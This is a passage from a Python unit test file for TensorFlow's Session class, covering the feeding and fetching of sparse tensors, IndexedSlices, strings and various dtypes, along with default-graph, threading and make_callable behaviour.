xy = s.run([[[tf_xy]], tf_xy, [tf_xy]])
self.assertAllEqual(xy, [[[x + y]], x + y, [x + y]])
self.assertEqual(scalar, type(xy[0][0][0]))
self.assertEqual(scalar, type(xy[1]))
self.assertEqual(scalar, type(xy[2][0]))
def testFetchOperationObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
v = variables.Variable(a, name='testFetchOperationObject_v')
s.run(v.initializer)
v_val = s.run(v)
self.assertAllEqual([[1.0, 1.0]], v_val)
def testFetchSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = sparse_tensor.SparseTensor(
constant_op.constant(indices), constant_op.constant(values),
constant_op.constant(shape))
# Single fetch, use as tuple
sp_out = s.run(sp)
indices_out, values_out, shape_out = sp_out
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Single fetch, use as SparseTensorValue
sp_out = s.run(sp)
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Tuple fetch, use as tuple
indices_out, values_out, shape_out = s.run(sp)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as tuple
(indices_out, values_out, shape_out), = s.run([sp])
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as SparseTensorValue
sp_out, = s.run([sp])
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Dict fetch (single value), use as tuple
indices_out, values_out, shape_out = s.run({'sp': sp})['sp']
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Dict fetch (list value), use as tuple
(indices_out, values_out, shape_out), = s.run({'sp': [sp]})['sp']
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Dict fetch, use as SparseTensorValue
sp_out = s.run({'sp': sp})['sp']
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Nested list fetch use as tuple
sp_out = s.run([[[sp]], sp])
indices_out, values_out, shape_out = sp_out[0][0][0]
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
indices_out, values_out, shape_out = sp_out[1]
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Nested list fetch, use as SparseTensorValue
sp_out = s.run([[[sp]], sp])
self.assertAllEqual(sp_out[0][0][0].indices, indices)
self.assertAllEqual(sp_out[0][0][0].values, values)
self.assertAllEqual(sp_out[0][0][0].dense_shape, shape)
self.assertAllEqual(sp_out[1].indices, indices)
self.assertAllEqual(sp_out[1].values, values)
self.assertAllEqual(sp_out[1].dense_shape, shape)
def testFeedSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = sparse_tensor.SparseTensor(
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),
)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with tuple, fetch sp directly
sp_out = s.run(sp, {sp: (indices, values, shape)})
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
# Feed SparseTensorValue and fetch sp directly.
sp_out = s.run(sp, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
def testFeedSparsePlaceholder(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(dtype=np.float32, name='placeholder1')
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
def testFeedSparsePlaceholderPartialShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(
shape=[None, 9, 2], dtype=np.float32, name='placeholder1')
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
def testFeedSparsePlaceholderConstantShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(
dtype=np.float32, shape=shape, name='placeholder1')
self.assertAllEqual(sp.dense_shape.eval(session=s), shape)
self.assertAllEqual(tensor_util.constant_value(sp.dense_shape), shape)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
def testFetchIndexedSlices(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices),
constant_op.constant(dense_shape))
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlices(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),
)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind_dense_shape = array_ops.identity(ind.dense_shape)
ind2 = ops.IndexedSlices(ind_values, ind_indices, ind_dense_shape)
# Feed with tuple
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape], {
ind: (values, indices, dense_shape)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape], {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testFetchIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = None
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices), None)
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = None
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(2, 3)), None)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind2 = ops.IndexedSlices(ind_values, ind_indices)
# Feed with tuple
values_out, indices_out = s.run([ind_values, ind_indices], {
ind: (values, indices)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue
values_out, indices_out = s.run([ind_values, ind_indices], {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testExtendWithStatelessOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
# Extend will happen here.
e_val = s.run(e)
self.assertAllEqual([[24.0]], e_val)
def testExtendWithStatefulOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testExtendWithStatefulOperations_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
# Extend will happen here.
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
def testExtendWithGroupBy(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
p = variables.Variable(a, name='testExtendWithGroupBy_p')
a_val = a.eval() # Force an Extend after this op.
self.assertAllEqual([[1.0, 1.0]], a_val)
b = constant_op.constant(2.0, shape=[1, 2])
q = variables.Variable(b, name='testExtendWithGroupBy_q')
# Extend will happen here.
init = control_flow_ops.group(p.initializer, q.initializer)
s.run(init)
p_val, q_val = s.run([p, q])
self.assertAllEqual([[1.0, 1.0]], p_val)
self.assertAllEqual([[2.0, 2.0]], q_val)
def testTensorGetMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
fed_c_val = c.eval(feed_dict={a.name: [[4.0, 4.0]]})
self.assertAllEqual([[16.0, 16.0, 16.0]], fed_c_val)
def testOperationRunMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 2], name='b')
v = variables.Variable(a, a.dtype)
assign_a_to_v = state_ops.assign(v, a)
assign_a_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[1.0, 1.0]], v_val)
assign_b_to_v = state_ops.assign(v, b)
assign_b_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[2.0, 2.0]], v_val)
assign_b_to_v.eval(feed_dict={'b:0': [[3.0, 3.0]]})
v_val = v.eval()
self.assertAllEqual([[3.0, 3.0]], v_val)
def testDefaultGraph(self):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
self.assertEqual(ops.get_default_graph(), a.graph)
self.assertEqual(ops.get_default_graph(), b.graph)
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testDefaultGraph_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def _testDefaultGraphInThread(self, constructed_event, continue_event, i):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='var_%d' % i)
# Block here until all threads have constructed their graph.
constructed_event.set()
continue_event.wait()
assign_c_to_v = state_ops.assign(v, c)
v.initializer.run()
assign_c_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def testDefaultGraphWithThreads(self):
# Fork ten threads that use their thread-local default graph.
threads = []
constructed_events = [threading.Event() for _ in range(10)]
continue_event = threading.Event()
for i, constructed_event in enumerate(constructed_events):
t = self.checkedThread(
target=self._testDefaultGraphInThread,
args=(constructed_event, continue_event, i))
threads.append(t)
for t in threads:
t.start()
for constructed_event in constructed_events:
constructed_event.wait()
continue_event.set()
for t in threads:
t.join()
def testParallelRun(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
ev = threading.Event()
def run_step():
ev.wait()
val = c.eval(session=sess)
self.assertEqual(val, 5.0)
threads = [self.checkedThread(target=run_step) for _ in range(100)]
for t in threads:
t.start()
ev.set()
for t in threads:
t.join()
def testRunFeedDict(self):
with session.Session() as s:
x = array_ops.zeros([2])
y = s.run(2 * x, feed_dict={x: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x.name: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x: [1, 1]})
assert (y == 2 * np.ones(2)).all()
# Test nested tuple keys
z = (((array_ops.zeros([2]),),), array_ops.zeros([2]),
(array_ops.zeros([2]),))
result = [z[0][0][0] * 2, z[1] * 2, z[2][0] * 2]
values = (((np.array([1, 1]),),), np.array([2, 2]), (np.array([3, 3]),))
result_value = s.run(result, feed_dict={z: values})
self.assertAllEqual(result_value[0], 2 * np.ones(2))
self.assertAllEqual(result_value[1], 2 * np.array([2, 2]))
self.assertAllEqual(result_value[2], 2 * np.array([3, 3]))
def testGraphDef(self):
with session.Session() as sess:
self.assertProtoEquals('versions { producer: %d min_consumer: %d }' %
(versions.GRAPH_DEF_VERSION,
versions.GRAPH_DEF_VERSION_MIN_CONSUMER),
sess.graph_def)
c = constant_op.constant(5.0, name='c')
self.assertEquals(len(sess.graph_def.node), 1)
d = constant_op.constant(6.0, name='d')
self.assertEquals(len(sess.graph_def.node), 2)
self.assertAllEqual(c.eval(), 5.0)
self.assertAllEqual(d.eval(), 6.0)
e = constant_op.constant(7.0, name='e')
self.assertEquals(len(sess.graph_def.node), 3)
self.assertAllEqual(e.eval(), 7.0)
def testUseAfterClose(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)):
sess.run(c)
def testUseAfterCloseConcurrent(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
def update_thread():
with self.assertRaisesWithPredicateMatch(
RuntimeError,
lambda e: 'Attempted to use a closed Session.' in str(e)):
while True:
sess.run(c)
t = threading.Thread(target=update_thread)
t.start()
time.sleep(0.1)
sess.close()
t.join()
def testUseEmptyGraph(self):
with session.Session() as sess:
with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'):
sess.run([])
with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'):
sess.run(())
with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'):
sess.run({})
def testNotEntered(self):
# pylint: disable=protected-access
self.assertEqual(ops._default_session_stack.get_default(), None)
# pylint: enable=protected-access
with ops.device('/cpu:0'):
sess = session.Session()
c_1 = constant_op.constant(5.0)
with sess.graph.as_default():
c_2 = constant_op.constant(5.0)
self.assertEqual(c_1.graph, c_2.graph)
self.assertEqual(sess.run(c_2), 5.0)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: 'No default session is registered.' in str(e)):
c_2.eval()
def testInteractive(self):
with ops.device('/cpu:0'):
sess = session.InteractiveSession()
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
self.assertAllEqual([[4.0, 4.0, 4.0]], c.eval())
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
self.assertAllEqual([[24.0]], e.eval())
sess.close()
def testInteractivePlacePrunedGraph(self):
sess = session.InteractiveSession()
# Build a graph that has a bad op in it (no kernel).
#
# This test currently does not link in any GPU kernels,
# which is why placing this is invalid. If at some point
# GPU kernels are added to this test, some other different
# op / device combo should be chosen.
with ops.device('/device:GPU:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(1.0, shape=[1, 2])
# Only run the valid op, this should work.
b.eval()
with self.assertRaises(errors.InvalidArgumentError):
a.eval()
sess.close()
def testDefaultSessionPlacePrunedGraph(self):
sess = session.Session()
# Build a graph that has a bad op in it (no kernel).
#
# This test currently does not link in any GPU kernels,
# which is why placing this is invalid. If at some point
# GPU kernels are added to this test, some other different
# op / device combo should be chosen.
with ops.device('/device:GPU:0'):
_ = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(1.0, shape=[1, 2])
with self.assertRaises(errors.InvalidArgumentError):
# Even though we don't run the bad op, we place the entire
# graph, which should fail with a non-interactive session.
sess.run(b)
sess.close()
def testSharedGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
with session.Session(graph=g) as sess1:
with session.Session(graph=g) as sess2:
self.assertAllEqual(sess1.run(c), sess2.run(c))
def testDuplicatedInputs(self):
with session.Session() as sess:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 3])
a_val, b_val, a2_val = sess.run([a, b, a])
self.assertAllEqual(a_val, [[1.0, 1.0]])
self.assertAllEqual(b_val, [[2.0, 2.0, 2.0]])
self.assertAllEqual(a2_val, [[1.0, 1.0]])
def testFeedAndFetch(self):
with session.Session() as sess:
for dtype in [
dtypes.float16, dtypes.float32, dtypes.float64, dtypes.int32,
dtypes.uint8, dtypes.int16, dtypes.int8, dtypes.int64, dtypes.bool,
dtypes.complex64, dtypes.complex128
]:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
np_dtype = dtype.as_numpy_dtype
feed_t = array_ops.placeholder(dtype=dtype, shape=shape)
out_t = array_ops.identity(feed_t)
np_array = np.random.randint(-10, 10, shape)
if dtype == dtypes.bool:
np_array = np_array > 0
elif dtype == dtypes.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
elif dtype == dtypes.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
self.assertAllEqual(np_array,
sess.run(out_t, feed_dict={
feed_t: np_array
}))
# Check that we can also get the feed back.
self.assertAllEqual(np_array,
sess.run(feed_t, feed_dict={
feed_t: np_array
}))
# Also check that we can get both back.
out_v, feed_v = sess.run(
[out_t, feed_t], feed_dict={
feed_t: np_array
})
self.assertAllEqual(np_array, out_v)
self.assertAllEqual(np_array, feed_v)
feed_fetch_runner = sess.make_callable([out_t, feed_t], [feed_t])
out_v, feed_v = feed_fetch_runner(np_array)
self.assertAllEqual(np_array, out_v)
self.assertAllEqual(np_array, feed_v)
def testMakeCallableOnTensorWithRunOptions(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
tensor_runner = sess.make_callable(a, accept_options=True)
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
res = tensor_runner(options=run_options, run_metadata=run_metadata)
self.assertEqual(42.0, res)
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testMakeCallableOnOperationWithRunOptions(self):
with session.Session() as sess:
a = variables.Variable(42.0)
b = state_ops.assign_add(a, 1.0)
sess.run(a.initializer)
tensor_runner = sess.make_callable(b.op, accept_options=True)
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
tensor_runner(options=run_options, run_metadata=run_metadata)
self.assertEqual(43.0, sess.run(a))
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testMakeCallableWithFeedListAndRunOptions(self):
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32)
a = math_ops.add(ph, 1.0)
tensor_runner = sess.make_callable(
a, feed_list=[ph.name], accept_options=True)
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
self.assertAllClose(42.0,
tensor_runner(
41.0,
options=run_options,
run_metadata=run_metadata))
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testFeedError(self):
with session.Session() as sess:
feed_t = array_ops.placeholder(dtype=dtypes.float32)
out_t = array_ops.identity(feed_t)
feed_val = constant_op.constant(5.0)
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
sess.run(out_t, feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.eval(feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.op.run(feed_dict={feed_t: feed_val})
def testFeedPrecisionLossError(self):
with session.Session() as sess:
largest_int64 = np.iinfo(np.int64).max
feed_int_implicit_int32 = constant_op.constant(1)
feed_int_explicit_int32 = constant_op.constant(1, dtype=dtypes.int32)
out_t = constant_op.constant(1.0)
with self.assertRaisesRegexp(TypeError,
'is not compatible with Tensor type'):
sess.run(out_t, feed_dict={feed_int_implicit_int32: largest_int64})
with self.assertRaisesRegexp(TypeError,
'is not compatible with Tensor type'):
sess.run(out_t, feed_dict={feed_int_explicit_int32: largest_int64})
def testStringFetch(self):
with session.Session():
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array(
[compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape) if size > 0 else []
c = constant_op.constant(c_list)
self.assertAllEqual(c.eval(), c_list)
def testStringFeed(self):
with session.Session() as sess:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array(
[compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape)
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=shape)
c = array_ops.identity(feed_t)
self.assertAllEqual(sess.run(c, feed_dict={feed_t: c_list}), c_list)
self.assertAllEqual(
sess.run(feed_t, feed_dict={
feed_t: c_list
}), c_list)
c_v, feed_v = sess.run([c, feed_t], feed_dict={feed_t: c_list})
self.assertAllEqual(c_v, c_list)
self.assertAllEqual(feed_v, c_list)
def testStringFeedWithNullCharacters(self):
with session.Session():
c_list = [b'\n\x01\x00', b'\n\x00\x01']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
self.assertEqual(c_list[0], out[0])
self.assertEqual(c_list[1], out[1])
def testStringFeedWithUnicode(self):
with session.Session():
c_list = [
u'\n\x01\x00', u'\n\x00\x01', u'\u26a3 unicode',
u'\U0001f60e deal with it'
]
